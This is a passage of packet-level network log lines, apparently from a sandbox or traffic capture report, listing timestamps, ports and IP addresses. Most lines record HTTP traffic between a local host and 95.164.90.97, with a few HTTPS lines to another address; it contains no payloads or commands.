Oct 8, 2024 20:47:24.004861116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004884958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004919052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004937887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004952908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004971981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004986048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005006075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.005023956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005038977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.005089045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.005110979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005145073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005178928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005208969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.005214930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005238056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.005249023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005275965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.005296946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.005882025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005938053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005945921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.005970955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.005986929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006022930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006088018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006120920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006136894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006171942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006210089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006241083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006279945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006294966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006302118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006330013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006364107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006381035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006398916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006412029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006447077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006759882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006793022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006819010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006829977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006841898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006886005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006905079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006937981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.006957054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.006970882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.007021904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.022676945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.022720098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.022761106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.022797108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088207960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088295937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088296890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088334084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088352919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088368893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088390112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088402033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088418961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088437080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088459015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088469028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088489056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088525057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088526011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088555098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088582039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088587999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088601112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088619947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088634014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088651896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088665962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088685036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088697910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088721037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088732958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088771105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088809967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088843107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088860035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088879108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.088888884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.088926077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.119889975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.119911909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.119923115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.119995117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.120028973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.120073080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.120084047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.120094061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.120105028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.120132923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.120141983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.120222092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.120232105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.120240927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.120265007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.120289087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.121669054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121687889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121697903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121714115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.121726036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121732950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.121759892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.121786118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121867895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121876955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121889114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121906996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.121932030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.121987104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.121998072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122014046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122021914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122050047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122143030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122152090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122163057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122176886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122205973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122234106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122272015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122329950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122339964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122349024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122359991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122360945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122383118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122390032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122407913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122518063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122526884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122536898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122548103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122559071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122562885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122602940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122602940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122735977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122745991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122756004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122777939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122807026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122895956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122909069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.122944117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.122992992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123003006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123027086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.123121023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123130083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123140097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123143911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.123151064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123161077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.123189926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.123317957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123327017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123336077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123346090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123399019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.123555899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123565912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123574018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123584986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123594999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123594046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.123605013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123616934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.123620987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.123646021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125031948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125083923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125093937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125093937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125121117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125138998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125184059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125199080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125210047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125220060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125233889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125263929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125276089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125371933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125381947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125391006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125405073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125416040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125442028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125622034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125633001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125642061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125650883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125660896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125664949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125672102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125683069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125683069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125693083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125699997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125703096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125725985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125749111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125847101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125883102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125888109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125897884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.125919104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.125933886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.126022100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126030922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126040936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126051903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126065969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.126089096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.126172066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126182079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126190901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126203060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126208067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.126214027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.126238108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.126262903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.174947023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.174974918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.174984932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175028086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175049067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175051928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175061941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175092936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175096989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175108910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175147057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175278902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175288916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175298929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175322056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175342083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175489902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175499916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175508976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175520897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175530910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175535917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175542116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175565958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175584078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175693989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175704002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175715923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175741911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175766945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.175821066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175828934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.175868988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.191612959 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.192357063 CEST	49782	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.192370892 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.193027020 CEST	49782	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.193031073 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.206566095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.206617117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.206628084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.206657887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.206676960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.206758976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.206768990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.206778049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.206789970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.206800938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.206801891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.206831932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.206856966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.206995010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.207005024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.207014084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.207024097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.207036018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.207046032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.207072973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.207204103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.208664894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.208715916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.208735943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.208745956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.208781004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.208838940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.208848000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.208853960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.208858967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.208872080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.208897114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.208913088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209038019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209055901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209065914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209078074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209078074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209089994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209103107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209106922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209106922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209126949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209148884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209268093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209306955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209311008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209316969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209327936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209338903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209351063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209352970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209379911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209481955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209491968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209503889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209517956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209523916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209549904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209572077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.209733009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.209742069 CEST	80	49755	95.164.90.97	192.168.2.5
